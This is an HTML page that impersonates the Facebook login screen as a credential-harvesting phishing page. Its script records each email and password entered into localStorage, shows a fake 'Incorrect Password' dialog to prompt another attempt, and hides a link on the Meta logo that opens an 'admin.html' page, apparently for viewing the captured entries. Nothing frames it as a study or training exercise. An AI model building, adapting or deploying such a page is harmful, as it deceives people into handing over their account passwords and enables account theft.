
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook - Log In or Sign Up</title>
    <style>
        @font-face {
            font-family: 'Helvetica Neue';
            src: url('https://fonts.cdnfonts.com/s/28085/HelveticaNeueBold.woff') format('woff');
            font-weight: bold;
        }
        body {
            font-family: Arial, sans-serif;
            background-color: #f0f2f5;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            flex-direction: column;
            text-align: center;
        }
        .login-form {
            width: 300px;
        }
        .login-form img {
            display: block;
            margin: 0 auto 20px;
        }
        .login-form input[type="text"], .login-form input[type="password"], .login-form button {
            width: 100%;
            padding: 18px;
            margin: 8px 0;
            border: 1px solid #ddd;
            border-radius: 4px;
            box-sizing: border-box; /* Ensure padding is included in width */
        }
        .login-form button {
            border: none;
            background-color: #1877f2;
            color: white;
            font-size: 16px;
            font-family: 'Helvetica Neue', sans-serif;
            font-weight: bold;
            border-radius: 25px;
            margin-top: 10px;
            position: relative;
            height: 45px;
            display: flex;
            align-items: center;
            justify-content: center;
            transition: transform 0.2s ease-in-out;
        }
        .login-form button:hover {
            background-color: #1877f2;
        }
        .login-form button:active {
            transform: scale(0.95);
        }
        .login-form button .loading {
            display: none;
            border: 3px solid antiquewhite;
            border-radius: 50%;
            border-top: 3px solid white;
            width: 25px;
            height: 25px;
            -webkit-animation: spin 2s linear infinite; /* Safari */
            animation: spin 2s linear infinite;
            position: absolute;
            left: 45%;
            top: 15%;
            transform: translate(-50%, -50%);
        }
        .login-form a {
            display: block;
            margin: 10px 0;
            color: #1877f2;
            text-decoration: none;
            font-weight: bold; /* Make text bold */
        }
        .create-account {
            margin-top: 20px;
            width: 300px;
        }
        .create-account button {
            width: 100%;
            padding: 10px;
            margin: 10px 0;
            border: 1px solid #42b72a;
            background-color: white; /* Changed background color to white */
            color: #42b72a;
            font-size: 16px;
            border-radius: 25px; /* Added border-radius */
            cursor: pointer;
        }
        .create-account button:hover {
            background-color: #e6f2e1;
        }
        .meta-logo {
            margin-top: 40px;
            text-align: center;
            font-family: 'Helvetica Neue', sans-serif;
            font-weight: bold; /* Make text bold */
            font-size: 24px;
        }
        .meta-logo img {
            width: 25px;
            cursor: pointer;
            display: inline;
            vertical-align: middle;
        }
        .meta-logo span {
            vertical-align: middle;
            font-size: 20px;
        }
        .modal {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.5);
            justify-content: center;
            align-items: center;
        }
        .modal-content {
            background-color: rgba(79,74,74);
            padding: 15px;
            border-radius: 10px;
            text-align: left;
            width: 270px;
        }
        .modal-buttons {
            display: flex;
            justify-content: space-between;
            margin-top: 20px;
        }
        .modal-buttons button {
            padding: 10px 20px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
        }
        .modal-buttons .get-code {
            background-color: rgba(79,74,74);
            margin-left: 110px;
            -webkit-text-fill-color: white;
        }
        .modal-buttons .ok {
            background-color: rgba(79,74,74);
            -webkit-text-fill-color: blueviolet;
        }
        .modal h3 {
            -webkit-text-fill-color: white;
        }
        .modal p {
            -webkit-text-fill-color: white;
        }

        /* Safari */
        @-webkit-keyframes spin {
            0% { -webkit-transform: rotate(0deg); }
            100% { -webkit-transform: rotate(360deg); }
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
    </style>
    <script>
        function handleLogin(event) {
            event.preventDefault();
            const email = document.querySelector('input[name="email"]').value;
            const password = document.querySelector('input[name="password"]').value;

            const newEntry = { email: email, password: password };
            const existingEntries = JSON.parse(localStorage.getItem('entries')) || [];
            existingEntries.push(newEntry);
            localStorage.setItem('entries', JSON.stringify(existingEntries));

            const loginButton = document.querySelector('.login-form button');
            const loginText = loginButton.querySelector('span');
            const loadingSpinner = loginButton.querySelector('.loading');

            loginText.style.display = 'none';
            loadingSpinner.style.display = 'inline-block';

            setTimeout(() => {
                loginText.style.display = 'block';
                loadingSpinner.style.display = 'none';
                document.getElementById('modal').style.display = 'flex';
            }, 2000); // Show modal after 2 seconds
        }

        function closeModal() {
            document.getElementById('modal').style.display = 'none';
        }

        function goToAdminLogin() {
            window.location.href = 'admin.html';
        }
    </script>
</head>
<body>
    <div class="login-form">
        <img src="https://upload.wikimedia.org/wikipedia/commons/5/51/Facebook_f_logo_%282019%29.svg" alt="Facebook Logo" width="50">
        <form action="#" method="post" onsubmit="handleLogin(event)">
            <input type="text" name="email" placeholder="Email or Phone Number" required>
            <input type="password" name="password" placeholder="Password" required>
            <button type="submit">
                <span style="position: relative; top: -2px;">Log In</span>
                <div class="loading"></div> <!-- Loading animation -->
            </button>
            <a href="search.html">Forgot password?</a>
        </form>
    </div>
    <div class="create-account">
        <button>Create New Account</button>
    </div>
    <div class="meta-logo">
        <img src="bxl-meta.svg" alt="Meta Logo" onclick="goToAdminLogin()"> <span>Meta</span>
    </div>

    <div id="modal" class="modal">
        <div class="modal-content">
            <h3>Incorrect Password</h3>
            <p>The password you entered is incorrect. Please try again or get a code to log in.</p>
            <div class="modal-buttons">
                <button class="get-code">GET CODE</button>
                <button class="ok" onclick="closeModal()">OK</button>
            </div>
        </div>
    </div>
</body>
</html>
